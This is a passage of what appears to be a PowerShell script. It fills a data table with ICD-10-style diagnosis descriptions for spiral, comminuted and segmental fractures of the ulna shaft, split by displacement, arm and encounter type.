spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, right arm","Displaced comminuted fracture of shaft of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, left arm","Displaced comminuted fracture of shaft of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of ulna, unspecified arm","Displaced comminuted fracture of shaft of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, right arm","Nondisplaced comminuted fracture of shaft of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, left arm","Nondisplaced comminuted fracture of shaft of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of ulna, unspecified arm","Nondisplaced comminuted fracture of shaft of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, right arm","Displaced segmental fracture of shaft of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, left arm","Displaced segmental fracture of shaft of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of ulna, unspecified arm","Displaced segmental fracture of shaft of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of ulna, right arm","Nondisplaced segmental fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null 